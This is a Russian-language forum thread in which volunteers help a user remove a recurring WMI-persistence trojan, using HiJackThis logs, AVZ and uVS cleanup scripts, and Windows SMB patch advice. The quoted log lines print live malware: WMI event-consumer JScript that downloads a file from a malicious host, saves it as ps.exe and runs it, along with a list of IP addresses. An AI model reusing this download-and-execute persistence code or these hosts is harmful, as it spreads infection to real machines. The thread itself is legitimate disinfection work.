Перейти к содержанию

trojan.multi.wmi run.a


Рекомендуемые сообщения

Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять.


Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять.

CollectionLog-2018.10.30-07.41.zip

Ссылка на сообщение
Поделиться на другие сайты
  • Ответов 56
  • Created
  • Последний ответ

Top Posters In This Topic

  • m0nster

    25

  • SQ

    23

  • regist

    5

  • mike 1

    2

Top Posters In This Topic

Popular Posts

TDSSKiller будет обновлен, только не так оперативно.

+ @m0nster, свежий лог uVS сделайте.

@noname, полностью согласен с вашим постом, но увы, согласно правилам раздела вы не имеете право отвечать и помогать в темах других пользователей.

Posted Images

Здравствуйте,

Сообщите пожалуйста, у Вас что прямой доступ к интернету? У Вас Firewall работает? Если работает закрывали ли порты SMB?

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O4 - MSConfig\startupreg: BGClients [command] = C:\Windows\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat (HKLM) (2018/10/29)
O22 - Task: (disabled) ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\system32\wbem\123.bat','');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BGClients','x32');
 DeleteFile('c:\windows\system32\wbem\123.bat','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ загрузите этот архив через данную форму

- Подготовьте лог AdwCleaner и приложите его в теме.

Похоже экплуатируют уязвимость SMB, сообщите если вы установили обновления для Windows 7 x86:
KB4012212
KB4012215
 

Ссылка на сообщение
Поделиться на другие сайты

 

Все сдела, Не помогло. ПК стоит за роутером, в котором открыт только порт SQL. Обновления вроде устанавливаются автоматом.

 

В HiJackThis у меня нет пунктов 025.

Ссылка на сообщение
Поделиться на другие сайты

Если Вы точно не скачивали HiJackThis по ссылки, а использоватили из каталога автологгера, то приложите новые логи по правилам.


Вы кстате замечали, что один из дисков дает сбои возможно он сыпится, по крайней мере записываются события об этом в логах.
 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207174
Источник: Disk
Время записи: 20181030041104.952148-000
Тип события: Ошибка
Пользователь: 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207173
Источник: Disk
Время записи: 20181030041103.452148-000
Тип события: Ошибка
Пользователь: 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207172
Источник: Disk
Время записи: 20181030041102.952148-000
Тип события: Ошибка
Пользователь: 
====== Журнал событий "Приложения" ======

ПК стоит за роутером, в котором открыт только порт SQL.

Роутер случайно не Mikrotik?

Ссылка на сообщение
Поделиться на другие сайты

Прверьте еще раз в HiJackThis из каталога автологера, там должны быть эти строки:

 

O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)

P.S. По крайней мере в логах которые вы прислали они присутствуют, не может быть, чтобы они были только в логах.

 

Нет. F@ST1704N от Ростелекома.

Он у Вас не настроен в режиме моста (bridge)?
Ссылка на сообщение
Поделиться на другие сайты

После простоя пару часов во включенном состоянии (без доступа в сеть) появились все вирусы снова. Сделал лог.

Модем в роутере, открыт только SQL порт. 025 удалил.

CollectionLog-2018.10.30-13.31.zip

Изменено пользователем m0nster
Ссылка на сообщение
Поделиться на другие сайты

Насколько видно, вы не профиксили записи 025 в HiJackThis.

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

 

Ссылка на сообщение
Поделиться на другие сайты

Насколько видно, вы не профиксили записи 025 в HiJackThis.

 

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

 

 

После перезапуска 025 пункты возвуращаються!

BASE_2018-10-30_16-08-05_v4.1.1.7z

Изменено пользователем m0nster
Ссылка на сообщение
Поделиться на другие сайты

В HiJackThis у меня нет пунктов 025.

сделайте скрин окна, чтобы было видно в чём вы пытаетесь фиксить и что их нет.

Ссылка на сообщение
Поделиться на другие сайты

Выполните скрипт в uVS:

;uVS v4.0.11 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
zoo %SystemDrive%\PROGRAMDATA\DESKEYG.EXE
delref %Sys32%\DRIVERS\37346692.SYS
delref %Sys32%\DRIVERS\44689483.SYS
delref %Sys32%\DRIVERS\56324358.SYS
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM_CONSUMER.[FUCKYOUMM_FILTER]
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
restart

каталог zoo заархивируйте в zoo.zip и  загрузите этот архив через данную форму
 

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.


×
×
  • Создать...